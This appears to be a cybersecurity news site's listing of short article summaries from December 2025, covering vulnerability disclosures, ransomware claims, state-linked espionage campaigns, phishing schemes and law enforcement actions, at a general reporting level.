Critical XSS Flaw in WordPress Plugin 'Invelity SPS connect' Disclosed

A reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2025-68876, was disclosed on December 28, 2025, affecting the 'Invelity SPS connect' WordPress plugin. The flaw, which has a CVSS score of 7.1, can be exploited by unauthenticated attackers and impacts all versions up to and including 1.0.8. At the time of disclosure, no patch was available. An attacker could trick a user into clicking a malicious link to execute arbitrary JavaScript in their browser, potentially leading to session hijacking. Administrators are advised to disable the plugin immediately.

Dec 29, 2025 · 4 min read

Qilin Ransomware Gang Adds Business Services Firm B Dynamic to Leak Site

The Qilin ransomware group, a prominent ransomware-as-a-service (RaaS) operation, has listed business services company 'B Dynamic' as its latest victim on its dark web data leak site. The December 1, 2025, posting indicates that the company has suffered a network compromise and data exfiltration. By publicizing the breach, the Qilin group is employing its standard double-extortion tactic to pressure the victim into paying a ransom to prevent the public release of stolen data. This incident highlights the persistent threat from established ransomware gangs.

Dec 28, 2025 · 5 min read

Clop Ransomware Breaches Barts Health NHS Trust via Oracle Zero-Day

The Clop ransomware gang has claimed responsibility for a significant data breach at Barts Health NHS Trust, one of England's largest healthcare providers. The attack, which occurred in August 2025, leveraged a zero-day vulnerability in Oracle E-Business Suite. The threat actors exfiltrated files from an invoice database containing the names and addresses of patients and former staff. This data was later published on Clop's dark web leak site. While core clinical systems were reportedly unaffected, the compromised information poses a serious risk for follow-on social engineering and fraud attacks. The incident is part of a wider campaign by Clop targeting the now-patched Oracle vulnerability.

Dec 28, 2025 · 4 min read

Everest Ransomware Claims Breach of Chrysler, Threatens to Leak Over 1TB of Data

The Everest ransomware group has claimed responsibility for a significant data breach at the American automaker Chrysler. In a post on its dark web leak site on December 25, 2025, the group alleged it exfiltrated over 1 terabyte (TB) of data, including a "full database" of company operations and over 100 GB of Salesforce data covering 2021 to 2025. Chrysler has not yet confirmed the breach, but the claim represents a serious threat of data exposure for the major automotive manufacturer, following a common double-extortion tactic.

Dec 28, 2025 · 5 min read

Living Off the Cloud: Phishing Campaign Abuses Google Cloud Service to Bypass Security Filters

A widespread and sophisticated phishing campaign is abusing Google Cloud's own Application Integration service to send malicious emails that appear to come from a legitimate Google address ("noreply-application-integration@google.com"). This technique allows the emails to bypass standard security filters like SPF and DMARC. The campaign, which sent nearly 9,400 emails in two weeks, impersonates routine notifications to trick users into clicking links that lead to credential harvesting pages, demonstrating how attackers are increasingly weaponizing trusted cloud platforms.

Dec 28, 2025 · 5 min read

Iran's "Prince of Persia" APT Returns with Upgraded Malware, Uses Telegram for C2

The Iranian state-sponsored threat group "Prince of Persia" has resurfaced with multiple active malware campaigns, according to a new report from SafeBreach. The APT group is deploying new variants of its signature "Tonnerre" and "Foudre" backdoors. In a significant tactical evolution, one new variant, Tonnerre v50, now uses Telegram for command and control (C2) communications, replacing older protocols. The campaigns, which feature multiple Domain Generation Algorithms (DGAs), appear to be targeting critical infrastructure, indicating a patient and re-tooled adversary.

Dec 28, 2025 · 6 min read

"Aisuru" Botnet Shatters Records with 29.7 Tbps DDoS Attack

A powerful botnet-for-hire service named "Aisuru" has emerged as a major global threat, responsible for a new record-breaking Distributed Denial-of-Service (DDoS) attack peaking at 29.7 Terabits per second (Tbps). The botnet, which leverages millions of compromised Internet of Things (IoT) devices and routers, has been linked to over 1,300 attacks in just three months. The industrial scale of the Aisuru service poses a severe risk to internet stability, with attacks impacting the gaming, telecommunications, and financial services sectors.

Dec 28, 2025 · 5 min read

Baker University Discloses Year-Old Breach Affecting Over 53,000 Individuals

Baker University in Kansas has begun notifying 53,624 individuals about a severe data breach that occurred in December 2024. Attackers maintained access to the university's network for over two weeks, from December 2 to December 19, 2024. The compromised data is highly sensitive, including names, Social Security numbers, student IDs, financial account information, and private health data. The university detected the breach following a network outage but is only now, a full year later, informing the victims.

Dec 27, 2025 · 5 min read

Critical RCE Flaw in n8n Puts 103,000+ Workflow Automation Servers at Risk

A critical remote code execution (RCE) vulnerability, CVE-2025-68613, with a CVSS score of 9.9, has been disclosed in the n8n workflow automation platform. The flaw affects over 103,000 publicly exposed instances. It allows an authenticated attacker with low-level privileges (the ability to create or edit workflows) to execute arbitrary commands on the underlying server by exploiting an expression injection weakness. This can lead to a full server compromise, data exfiltration, and lateral movement into connected systems. Users are urged to upgrade to patched versions (1.120.4, 1.121.1, or 1.122.0) immediately.

Dec 27, 2025 · 4 min read

LockBit 5.0 Ransomware Claims Attack on Greek Luxury Hotel Group EM Resorts

On December 26, 2025, the prolific LockBit 5.0 ransomware group claimed responsibility for a cyberattack against EM Resorts, a luxury hotel operator based in Crete, Greece. The group posted a notice on its dark web leak site, threatening to publish exfiltrated data unless a company representative makes contact. This incident follows LockBit's typical double-extortion model, where they both encrypt victim data and steal it for leverage. The full scope of the breach and the type of data stolen have not yet been disclosed, but the attack highlights the ongoing threat ransomware poses to the hospitality industry.

Dec 27, 2025 · 4 min read

Typo in Windows Activation Script Leads to Cosmali Loader Malware Infection

A typosquatting campaign discovered on December 26, 2025, is targeting users of the popular Microsoft Activation Scripts (MAS) tool. Attackers registered the domain `get.activate[.]win`, a common misspelling of the legitimate domain. Users who mistype the command are redirected to the malicious site, which infects their systems with the Cosmali Loader malware. This loader, in turn, deploys additional payloads, including cryptominers and the XWorm Remote Access Trojan (RAT), giving attackers full control over the victim's machine. In a strange twist, some victims received a pop-up warning them of the infection, believed to be from a third party who hacked the malware's C2 panel.

Dec 27, 2025 · 4 min read

Debian Patches High-Severity SQL Injection Flaw in PgBouncer

On December 27, 2025, the Debian project released a security update for a high-severity SQL injection vulnerability, CVE-2025-12819, in PgBouncer, a widely used connection pooler for PostgreSQL. The flaw, which has a CVSS score of 8.1, allows an unauthenticated remote attacker to execute arbitrary SQL commands. The vulnerability can be triggered by injecting a malicious 'search_path' parameter during the authentication process. The issue has been fixed in PgBouncer version 1.25.1 and backported to Debian 11 'bullseye' in version 1.15.0-1+deb11u2. Administrators are urged to upgrade their packages to mitigate the risk.

Dec 27, 2025 · 4 min read

Evasive Panda APT Hijacks DNS to Deploy MgBot Backdoor in Multi-Country Espionage Campaign

A sophisticated, long-running cyber-espionage campaign by the China-linked threat actor 'Evasive Panda' (also known as Bronze Highland) has been detailed. Active between November 2022 and November 2024, the group targeted entities in Türkiye, China, and India. Instead of traditional phishing, the attackers used adversary-in-the-middle (AitM) attacks, specifically DNS poisoning, to hijack legitimate software update channels. This allowed them to deliver the modular MgBot backdoor, a potent espionage tool capable of file harvesting, keylogging, and credential theft, by injecting it into the legitimate 'svchost.exe' process.

Dec 26, 2025 · 5 min read

Romanian Energy Giant Hit by 'Gentlemen' Ransomware in Holiday Attack

Romania's largest coal-based energy producer, Oltenia Energy Complex, was struck by the 'Gentlemen' ransomware group in a targeted attack on December 26, 2025. The incident disrupted key business applications, including ERP systems and corporate email, by encrypting files. While power generation and the national energy grid were not affected, the attack highlights the increasing trend of targeting critical infrastructure during holiday periods when staffing is reduced. The company has isolated affected systems and initiated an investigation with Romania's organized crime unit.

Dec 26, 2025 · 4 min read

Critical Flaws Under Fire: 'React2Shell' (CVSS 10.0) and Windows Zero-Day Actively Exploited

A December 26 security report highlights a convergence of critical vulnerabilities being actively exploited in the wild. Among them is 'React2Shell' (CVE-2025-55182), a CVSS 10.0 remote code execution flaw in React Server Components used to deploy cryptominers. Additionally, a Windows zero-day (CVE-2025-62221) allowing local privilege escalation to SYSTEM is being used in targeted attacks. The report also warns of two high-severity authentication bypass vulnerabilities (CVE-2025-59718 and CVE-2025-59719) in FortiGate firewalls, creating a multi-front threat for organizations.

Dec 26, 2025 · 4 min read

Christmas Day Barrage: Mass Exploit Campaign Hits Adobe ColdFusion Servers

A massive, coordinated exploitation campaign targeted Adobe ColdFusion servers, peaking on Christmas Day 2025. Security firm GreyNoise reported that a single threat actor, operating almost exclusively from Japan-based infrastructure, launched nearly 6,000 exploit attempts against more than ten different ColdFusion CVEs. The primary attack vector was JNDI/LDAP injection. This activity is believed to be part of a much larger initial access broker operation, where the same actor has been observed scanning for hundreds of different vulnerabilities across numerous technology stacks to compromise systems and sell access to other cybercriminals.

Dec 26, 2025 · 5 min read

Critical Flaw in WHILL Wheelchairs Allows Remote Hijacking via Bluetooth

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory for a critical vulnerability, CVE-2025-14346, in WHILL electric wheelchairs. The flaw, rated 9.8 on the CVSS scale, stems from a missing authentication mechanism over Bluetooth. It allows an attacker within Bluetooth range (approx. 30 feet) to pair with a device and gain complete control, including issuing movement commands and overriding speed limits. This poses a direct physical safety risk to users. The manufacturer, WHILL Inc., has deployed firmware and application mitigations.

Dec 26, 2025 · 4 min read

HoneyMyte APT (Mustang Panda) Deploys New Kernel-Mode Rootkit to Hide Backdoor

The Chinese cyber-espionage group HoneyMyte (also known as Mustang Panda) has significantly upgraded its toolkit by incorporating a kernel-mode rootkit, according to research from December 26, 2025. The rootkit is used to protect and conceal a new variant of its exclusive ToneShell backdoor. The malicious driver, often signed with a stolen certificate, registers itself as a mini-filter to hide the malware's files, processes, and registry keys from security tools. This advanced technique, observed in attacks against government targets in Myanmar and Thailand, dramatically increases the malware's stealth and persistence.

Dec 26, 2025 · 5 min read

CISA Warns of Code Execution Flaw in WatchGuard Fireware OS

On December 26, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert for a vulnerability in WatchGuard's Fireware OS. The flaw could potentially allow an attacker to execute arbitrary code on an affected network security appliance. Specific details such as the CVE identifier and affected versions were not included in the initial alert. CISA urges administrators of WatchGuard devices to review vendor advisories for technical details and apply recommended mitigations to protect their network perimeters.

Dec 26, 2025 · 3 min read

SEC Busts $14M AI-Powered Crypto Scam That Used Deepfakes

The U.S. Securities and Exchange Commission (SEC) has charged seven entities for their involvement in a sophisticated cryptocurrency investment scam that defrauded retail investors of over $14 million. The scheme, which ran for a year, used social media ads featuring deepfake videos of financial professionals to lure victims into private messaging groups. Inside these groups, fraudsters posing as experts used AI-generated investment tips to build trust before directing victims to fraudulent trading platforms. When investors tried to withdraw funds, they were hit with advance fee demands, compounding their losses.

Dec 25, 2025 · 4 min read

2025 in Review: Mega-Deals Like Google/Wiz and Palo Alto/CyberArk Reshape Cybersecurity

The cybersecurity industry witnessed a massive wave of consolidation in 2025, with total M&A deal value approaching the record $75 billion set in 2021. A year-end analysis highlights several multi-billion dollar mega-deals, including Google's $32 billion acquisition of Wiz, Palo Alto Networks' $25 billion purchase of CyberArk, and ServiceNow's $7.75 billion deal for Armis. This surge reflects a fundamental market shift away from point solutions and towards integrated, simplified, and automated security platforms capable of managing complex risks across cloud, AI, and identity.

Dec 25, 2025 · 4 min read

NIST and MITRE Launch $20M AI Centers to Secure Critical Infrastructure

The U.S. National Institute of Standards and Technology (NIST) and the non-profit MITRE Corporation have announced a $20 million investment to establish two new national artificial intelligence (AI) research centers. The initiative aims to accelerate the adoption of AI to boost U.S. manufacturing competitiveness and to develop advanced methods for securing the nation's critical infrastructure from AI-driven cyberthreats. The centers will leverage MITRE's extensive experience in operating federal R&D centers and its public contributions like the ATT&CK framework.

Dec 25, 2025 · 3 min read

Malicious Scripts Targeting ICS Surge in East Asia, Kaspersky Reports

A Q3 2025 threat report from Kaspersky's ICS CERT reveals a significant increase in cyber threats targeting Industrial Control Systems (ICS) in East Asia. The region jumped to third place globally for the percentage of ICS computers where malicious objects were blocked. The most alarming trend was a surge in malicious scripts and phishing pages, which became the top threat category, with attack rates 1.4 times higher than the global average. This spike is primarily attributed to attacks targeting the engineering and ICS integrator sector in Mainland China, where malware was found hidden in customized P2P client applications.

Dec 25, 2025 · 5 min read

Fake Job Ad Scams Surge Across MENA Region, Experts Warn

Security researchers are warning of a rising tide of coordinated scam campaigns targeting job seekers across the Middle East and North Africa (MENA) region. These campaigns utilize fake online job advertisements posted on social media and job portals to deceive individuals. The goal is to trick victims into divulging sensitive personal information or making fraudulent payments for non-existent application fees or training materials. This trend aligns with a global increase in sophisticated digital fraud, where criminals exploit economic conditions and the need for employment.

Dec 25, 2025 · 3 min read

AI Adoption Fuels 'Massive' Cloud Attack Surface Expansion, Palo Alto Networks Report Warns

Palo Alto Networks' 2025 'State of Cloud Security Report' reveals that the rapid adoption of AI is creating an unprecedented expansion of the cloud attack surface. The study, surveying 2,800 security leaders, found that 99% of organizations have had their AI systems attacked in the last year. The use of generative AI in coding is producing insecure code faster than security teams can remediate it, creating a significant risk gap. API attacks have surged by 41% year-over-year, and lenient identity and access management (IAM) remains a top vulnerability. The report calls for a unified, platform-based approach to cloud security to counter AI-weaponized threats.

Dec 24, 2025 · 5 min read

CISA Adds Actively Exploited Fortinet SSO Flaw to KEV Catalog, Urges Immediate Patching

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical Fortinet vulnerability, CVE-2025-59718, to its Known Exploited Vulnerabilities (KEV) catalog, indicating active attacks in the wild. The flaw, rated 9.1 CVSS, allows an unauthenticated attacker to bypass FortiCloud single sign-on (SSO) authentication on multiple products, including FortiOS and FortiProxy, by sending a crafted SAML message. Security firm Arctic Wolf observed attackers exploiting the flaw within days of its disclosure to export device configurations and harvest credentials. CISA has mandated that federal agencies patch by December 23, 2025, and strongly advises all organizations to apply updates or disable the feature immediately.

Dec 24, 2025 · 5 min read

Anna's Archive Scrapes 300TB of Spotify Music Data in "Preservation" Effort

The hacktivist and digital preservation group Anna's Archive has announced it scraped and archived nearly 300 TB of data from the music streaming giant Spotify. The trove includes metadata for 256 million tracks and audio for 86 million songs, which the group plans to release via torrents. Spotify clarified this was not a system breach but a large-scale violation of its terms of service by third-party accounts created to systematically exfiltrate content. The company confirmed that no private user data like passwords or payment details were compromised and that the abusive accounts have been disabled.

Dec 23, 2025 · 6 min read

DoJ Dismantles $28M Bank Fraud Ring, Seizes Phishing Database

The U.S. Department of Justice has seized the domain `web3adspanels.org` and its associated backend database, which were central to a massive bank account takeover fraud operation. The criminal scheme used phishing websites to impersonate financial institutions and harvest victim credentials, leading to attempted losses of approximately $28 million and actual losses of $14.6 million. The action follows an FBI warning about this type of fraud and was coordinated with law enforcement in Estonia and Georgia.

Dec 23, 2025 · 4 min read

New MacSync Malware Dropper Bypasses macOS Gatekeeper with Apple Notarization

A new campaign is distributing the MacSync information-stealing malware using a dropper that successfully bypasses Apple's macOS Gatekeeper security feature. The malicious installer is packaged as a disk image for a fake messaging app, and crucially, has been both digitally signed and notarized by Apple. This abuse of Apple's own security vetting process allows the malware to appear as a trusted application, tricking users into running it and compromising their systems to exfiltrate sensitive information.

Dec 23, 2025 · 4 min read

Kazakhstan Issues New National Cybersecurity Guidelines Amid Rising Public Awareness

On December 23, 2025, Kazakhstan's Ministry of Digital Development, Innovation and Aerospace Industry (MAIDD) published updated national recommendations for cybersecurity and personal data protection. This initiative aims to strengthen the country's digital defenses and comes as a recent study reveals that public awareness of cyber threats has surged to 86% in 2025, up from 62.9% in 2018. The new guidelines emphasize key practices like encryption and the use of antivirus software.

Dec 23, 2025 · 3 min read

Major Blow to African Cybercrime: 574 Arrested, $3M Seized in International Takedown

A large-scale, coordinated international law enforcement operation has dismantled several major cybercrime networks operating across West and Central Africa. The crackdown resulted in the arrest of 574 individuals and the seizure of approximately $3 million. The operation targeted criminal syndicates involved in a range of illicit activities, including Business Email Compromise (BEC) scams, ransomware attacks, and other forms of online fraud. Arrests were made in Senegal, Ghana, Benin, and Cameroon.

Dec 23, 2025 · 4 min read

Romanian Water Authority Crippled by Ransomware, 1,000 Systems Encrypted with BitLocker

On December 20, 2025, Romania's national water authority, Administrația Națională Apele Române, was targeted in a significant ransomware attack. The incident compromised approximately 1,000 IT systems across its headquarters and 10 of 11 regional offices. Attackers employed a "living off the land" technique, weaponizing the native Windows BitLocker tool to encrypt systems instead of deploying custom ransomware. While IT services such as email, web servers, and GIS applications were disrupted, the agency confirmed that its Operational Technology (OT) networks controlling physical water infrastructure were not impacted, preventing a disruption to public water services. The Romanian National Cyber Security Directorate (DNSC) is investigating the incident and has reiterated its policy of not negotiating with attackers.

Dec 22, 2025 · 6 min read

Nissan Breach Exposes 21,000 Customers After Third-Party Red Hat Server Compromise

Nissan Motor Co. announced on December 22, 2025, a data breach affecting approximately 21,000 customers. The incident was a result of a supply chain attack, originating from the compromise of a Red Hat-managed GitLab server. This server was used by a third-party contractor developing a customer management system for a Nissan dealership. Red Hat detected the initial unauthorized access on September 26, 2025, and notified Nissan on October 3. The exposed data includes customer names, addresses, phone numbers, and partial email addresses. The extortion group ShinyHunters and a group called 'Crimson Collective' have been linked to the initial attack on Red Hat's infrastructure.

Dec 22, 2025 · 5 min read

Anubis Ransomware Hits AllerVie Health, Exposing Patient SSNs and Driver's Licenses

AllerVie Health, a Texas-based healthcare provider, began notifying patients on December 22, 2025, of a ransomware attack that exposed highly sensitive personal information. The company detected the intrusion on November 2, 2025, with forensic analysis revealing unauthorized access occurred between October 24 and November 3. The exposed data includes patient names, Social Security numbers, and driver's license numbers. The attack has been linked to the Anubis ransomware group, which allegedly claimed to have stolen data from over 30,000 patients on its dark web leak site. AllerVie is offering complimentary credit monitoring services to affected individuals.

Dec 22, 2025 · 6 min read

New WhatsApp Hijack Method Bypasses 2FA via SIM Swapping Attacks

On December 21, 2025, security researchers highlighted a growing attack method used to hijack WhatsApp accounts that bypasses traditional authentication measures. The technique relies on SIM swapping, where attackers use social engineering to convince a victim's mobile carrier to transfer their phone number to a SIM card controlled by the attacker. Once they control the number, they can install WhatsApp and receive the SMS verification code to take over the account, locking the legitimate user out. This method circumvents the need to crack passwords or bypass on-device security. The North Korea-linked threat group APT37 has reportedly been observed using this technique.

Dec 22, 2025 · 5 min read

Data Breaches Trigger Securities Lawsuits Against Tech Companies

A report on December 21, 2025, revealed a growing legal trend where companies face securities class-action lawsuits following data breaches. Two unnamed technology companies are now facing such litigation from investors. The lawsuits allege that the companies made misleading statements or failed to disclose known cybersecurity weaknesses in their public filings, which artificially inflated their stock prices. When the data breaches were eventually announced, the subsequent drop in stock value caused financial harm to investors, who are now suing to recover their losses. This highlights the increasing pressure from regulators and shareholders for transparent and accurate cybersecurity risk disclosures.

Dec 22, 2025 · 4 min read

CEO of Chinese Cybersecurity Firm Cnzxsoft Hit with Spending Ban Amid Debt Crisis

On December 22, 2025, veteran Chinese cybersecurity firm Cnzxsoft (Zhongxin Network Information Security Co., Ltd.) was placed on a Beijing court's list of "dishonest judgment debtors" due to a severe liquidity crisis. As a result, the company's founder and CEO, Zhou Xiandong, was issued a Restricted Consumption Order, which bars him from high-cost personal spending such as luxury travel. Cnzxsoft, a firm with major state-owned clients like CCTV and China Mobile, is facing profound financial distress, highlighting systemic cash flow problems within China's IT sector, where long payment cycles from government contracts are common.

Dec 22, 2025 · 3 min read

Australian Fertility Clinic Genea Hit by 'Termite' Ransomware Gang

The 'Termite' ransomware gang has claimed responsibility for an attack on Australian fertility provider Genea. The group, which uses a variant of the leaked Babuk ransomware code, alleges it exfiltrated 700GB of highly sensitive patient data, including medical histories and diagnostic results. This double-extortion attack places victims at severe risk of fraud and personal extortion, highlighting the growing threat to the healthcare sector.

Dec 21, 2025 · 5 min read

Australian Health Audit Finds Clinicians Routinely Bypass Security Controls

An audit of the New South Wales (NSW) healthcare system in Australia has revealed that clinicians are routinely bypassing critical cybersecurity controls, for example by sharing passwords and using personal devices, to save time in high-pressure environments. This widespread "normalisation of non-compliance" creates significant security gaps and increases the risk of cyberattacks in the already heavily targeted healthcare sector, highlighting a critical failure in security culture.

Dec 21, 2025 · 5 min read

React2Shell Apocalypse: CVSS 10.0 Flaw Exploited by China, North Korea, and Botnets

A critical, unauthenticated remote code execution vulnerability (CVSS 10.0) in React Server Components, dubbed 'React2Shell' and tracked as CVE-2025-55182, is under widespread attack. The flaw allows attackers to take full control of vulnerable servers with a single crafted HTTP request. Within hours of disclosure, Chinese and North Korean state-sponsored groups, alongside criminal botnets, began mass exploitation campaigns. These attacks deploy a range of malware, including the new EtherRAT backdoor, Cobalt Strike, and infostealers. With over 165,000 vulnerable instances identified and half remaining unpatched, CISA has issued an emergency directive for federal agencies to mitigate the threat immediately, highlighting the extreme urgency for all affected organizations to apply patches.

Dec 20, 2025 · 7 min read

University of Sydney Data Breach Exposes Info of 27,500 Staff and Students

The University of Sydney has announced a significant data breach affecting approximately 27,500 individuals after an unauthorized party gained access to an internal IT code library. The compromised repository contained historical data files with personal information of current and former staff, affiliates, students, and alumni, primarily from 2010-2019. Exposed data includes names, dates of birth, phone numbers, and home addresses. The university has secured the environment and is in the process of notifying all affected individuals while an investigation is ongoing.

Dec 20, 2025 · 5 min read

Nefilim Ransomware Operator Pleads Guilty in U.S. Court

Artem Aleksandrovych Stryzhak, a Ukrainian national, has pleaded guilty in a U.S. federal court for his role in the Nefilim ransomware conspiracy. Stryzhak, 35, was a key operator for the ransomware group that targeted high-revenue companies in the U.S. and Europe between 2018 and 2021, causing millions in damages. The group was known for its double-extortion tactics, stealing data before encryption and threatening to leak it on their 'Corporate Leaks' site. Stryzhak faces up to 10 years in prison, while his co-conspirator, Volodymyr Tymoshchuk, remains at large with an $11 million bounty offered by the U.S. Department of State.

Dec 20, 2025 · 5 min read

URGENT: Cisco Warns of Active Zero-Day Attacks on Email Security Appliances

Cisco has issued an urgent security advisory for an actively exploited zero-day vulnerability in its AsyncOS software, affecting Cisco Secure Email Gateway (formerly IronPort) and Secure Email and Web Manager appliances. Threat actors are leveraging the unpatched flaw to deploy persistent backdoors and tunneling tools, granting them long-term, stealthy access to enterprise email infrastructure. A patch is not yet available, and Cisco is strongly urging administrators to apply interim mitigations, restrict management access, and monitor logs for signs of compromise.

Dec 20, 2025 · 5 min read

Warning: "GhostPairing" Attack Hijacks WhatsApp Accounts with Malicious QR Codes

A new social engineering campaign dubbed "GhostPairing" is exploiting WhatsApp's multi-device linking feature to hijack user accounts. India's CERT-In has issued a high-severity warning about the attack, which tricks victims into scanning a malicious QR code or entering a pairing code from a fraudulent website. This action links the attacker's device to the victim's account, granting them full access to messages, contacts, and media without needing a password or SIM swap. The attack bypasses traditional authentication, relying purely on deceiving the user into performing the linking action themselves.

Dec 20, 2025 · 5 min read

MongoDB 'MongoBleed' Flaw Allows Unauthenticated Data Leaks, Actively Exploited

MongoDB has disclosed a high-severity vulnerability, CVE-2025-14847, nicknamed "MongoBleed." The flaw is an unauthenticated memory leak in the database server's zlib compression functionality. A remote, unauthenticated attacker can send a malformed message to a vulnerable server, causing it to leak contents of its memory. This exposed data can include sensitive information like plaintext passwords, API keys, and session tokens from other user sessions. The vulnerability affects multiple versions of MongoDB, and with a PoC exploit public and active exploitation confirmed, administrators are urged to upgrade immediately or disable zlib compression as a workaround.

Dec 20, 2025 · 5 min read

.NET "SOAPwn" Flaw Allows Authentication Bypass and RCE in Enterprise Apps

A critical vulnerability nicknamed "SOAPwn" has been discovered in .NET applications utilizing SOAP-based web services. The flaw, reported on December 19, 2025, allows an unauthenticated attacker to send a specially crafted SOAP request to bypass security checks and achieve remote code execution. This poses a severe risk to many enterprise applications that rely on the legacy SOAP protocol for critical business functions. Microsoft has issued guidance and released patches, urging organizations to update their applications immediately and monitor for suspicious SOAP traffic.

Dec 20, 2025 · 5 min read

China-Linked Hackers Exploit Critical Cisco Email Gateway Zero-Day

Cisco has revealed that a China-affiliated advanced persistent threat (APT) group, tracked as UAT-9686, is actively exploiting a critical zero-day vulnerability in its email security products. The flaw, CVE-2025-20393, is a remote code execution vulnerability with a maximum CVSS score of 10.0, affecting Cisco Secure Email Gateway and Secure Email and Web Manager appliances. The attackers have been exploiting the flaw since late November 2025 to gain root-level access and have deployed persistence mechanisms on compromised devices. Due to active exploitation by a nation-state actor, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies.

Dec 19, 2025 · 6 min read

HPE Issues Urgent Patch for 10.0 CVSS RCE Flaw in OneView

Hewlett Packard Enterprise (HPE) has released an urgent security advisory for CVE-2025-37164, a critical vulnerability in its OneView infrastructure management software with a maximum CVSS score of 10.0. The flaw allows a remote, unauthenticated attacker to achieve complete remote code execution on affected systems. HPE OneView versions 5.20 through 10.20 are impacted. Given that OneView serves as a central control plane for enterprise server, storage, and firmware management, a compromise could give an attacker control over vast segments of IT infrastructure. HPE is urging customers to upgrade to the patched version 11.0 or apply an emergency hotfix immediately.

Dec 19, 2025 · 5 min read

Actively Exploited RCE Flaw in WatchGuard Firewalls Puts Networks at Risk

WatchGuard has issued an urgent advisory for customers to patch CVE-2025-14733, a critical remote code execution vulnerability in its Fireware OS that is confirmed to be under active exploitation. The flaw, an out-of-bounds write issue in the IKEv2 process, has a CVSS score of 9.3 and can be exploited by an unauthenticated remote attacker. The vulnerability affects Firebox firewalls with specific IKEv2 VPN configurations enabled. Given that firewalls are prime targets for initial access, immediate application of the provided security updates is crucial to protect network perimeters from compromise.

Dec 19, 2025 · 5 min read

Manufacturing Web Portals Are a Weak Link in Supply Chain Attacks

A new report reveals that cybercriminals are increasingly targeting manufacturers through their public-facing web portals, such as supplier and customer forms, to execute supply chain attacks. Attackers are using bots and SQL injection to compromise these forms, which often run on legacy systems with weak security. The goal is to steal sensitive data, including credentials and intellectual property, or to gain a foothold to attack more heavily regulated downstream customers in defense, healthcare, and finance. A survey found that 85% of manufacturing firms experienced a security incident related to web forms, and 42% confirmed a resulting data breach.

Dec 19, 2025 · 5 min read

"GhostPoster" Malware Infects 50,000+ Firefox Users via Malicious Add-ons

A stealthy malware campaign named "GhostPoster" has infected over 50,000 Mozilla Firefox users by distributing 17 malicious browser extensions. The add-ons, which masqueraded as legitimate tools like VPNs and ad blockers, have been removed from the Firefox store. The malware employed a clever technique, hiding obfuscated JavaScript within the add-on's logo image file. This code would then contact command-and-control (C2) servers to download a final payload designed for hijacking affiliate links and committing ad fraud. The campaign used evasion techniques like randomized and delayed C2 callbacks to avoid detection.

Dec 18, 2025 · 4 min read

"Scripted Sparrow" BEC Group Targets Finance Teams with Highly Structured Attacks

A disciplined and persistent Business Email Compromise (BEC) group, newly identified by Fortra as "Scripted Sparrow," has been systematically targeting corporate finance teams since at least June 2024. The group employs a structured and well-researched approach, sending highly credible phishing emails with fake invoices that impersonate professional services firms. To add legitimacy, the attackers often include forged prior email correspondence from a company executive authorizing the payment. The group utilizes a large network of US-based mule accounts for cashing out, indicating a well-organized and persistent financial threat.

Dec 18, 2025 · 4 min read

"IRLeaks" Supply Chain Attack Hits Iranian Banks, Exposing Millions of Customer Records

A major supply chain attack dubbed "IRLeaks" has resulted in a significant data breach affecting several prominent Iranian banks and millions of their customers. Attackers first compromised a third-party IT vendor in October 2025, using it as a pivot point to infiltrate the banks' networks. Over the following month, they exfiltrated vast amounts of financial data and personally identifiable information (PII), including national IDs and bank account numbers, before the breach was discovered in late November. The incident highlights the critical risks associated with third-party vendor security and inadequate patch management.

Dec 18, 2025 · 4 min read

Ransomware Evolves: "ClickFix" Social Engineering and Threat Actor Alliances on the Rise

A December 2025 threat report from NCC Group indicates that while ransomware attack volumes plateaued in November with 583 incidents, their sophistication markedly increased. Attackers are increasingly adopting the "ClickFix" (also known as ClearFake) social engineering technique, which tricks users into manually running malicious commands, bypassing many automated defenses. The report also highlights a trend of collaboration, with groups like DragonForce forming alliances with skilled affiliates from other networks. The Qilin ransomware group remained the most prolific actor, with the industrials sector and North America being the most targeted.

Dec 18, 2025 · 4 min read

"Operation ForumTroll" APT Targets Russian Academics with Plagiarism Lure

The Advanced Persistent Threat (APT) group known as Operation ForumTroll has launched a new, highly targeted phishing campaign aimed at Russian political scientists and academics. Active since at least 2022, the group's latest attack uses meticulously crafted emails impersonating a major Russian scientific library, eLibrary.ru. The emails lure victims into downloading a supposed plagiarism report, which is a ZIP archive containing a malicious .LNK file. Executing the shortcut file triggers a PowerShell script that downloads and installs the Tuoni command-and-control (C2) framework, giving the attackers remote access for espionage purposes.

Dec 18, 2025 · 4 min read

Google Investigates Malicious Code Found in Search Result Infrastructure

Google has launched an urgent investigation after cybersecurity analysts discovered anomalous, encrypted code snippets and obfuscated JavaScript embedded within its core search result payloads on December 17, 2025. The malicious code appears designed to exploit browser sandboxing vulnerabilities, which could potentially enable remote code execution or data theft on users' systems. While Google has not confirmed any user impact and states it is neutralizing the threat, the incident represents a highly sophisticated attack against critical global internet infrastructure, prompting the involvement of government agencies.

Dec 18, 2025 · 4 min read

SANS Report: OT/ICS Cyber Incidents Rising, 40% Cause Downtime

A new report from the SANS Institute highlights a dangerous trend in the security of Operational Technology (OT) and Industrial Control Systems (ICS). The '2025 State of ICS/OT Security Report' found that over 21% of organizations experienced a cyber incident in their OT environment in the past year. Of those, 40.3% suffered operational downtime. Ransomware was a primary cause, responsible for 37.9% of incidents, with unauthorized external connections being the top initial access vector. The report also points to a significant 'resilience gap,' with recovery times often exceeding one month.

Dec 17, 2025 · 5 min read

SoundCloud and Pornhub Confirm User Data Exposure in Separate Breaches, One Via Third-Party

Both SoundCloud and Pornhub have confirmed security incidents exposing user data. SoundCloud suffered a direct breach of an ancillary service dashboard, resulting in the exfiltration of email addresses and public profile information for up to 28 million users (20% of its user base). The company states passwords and financial data were not affected. Separately, Pornhub announced that historical analytics data of some Premium members was exposed due to a breach at its former third-party analytics vendor, Mixpanel. The notorious hacking group ShinyHunters has claimed the Mixpanel breach and is attempting to extort Pornhub, alleging they stole a massive database of user search and watch history.

Dec 17, 2025 · 5 min read

French Interior Ministry Confirms Cyberattack Compromised Email Servers

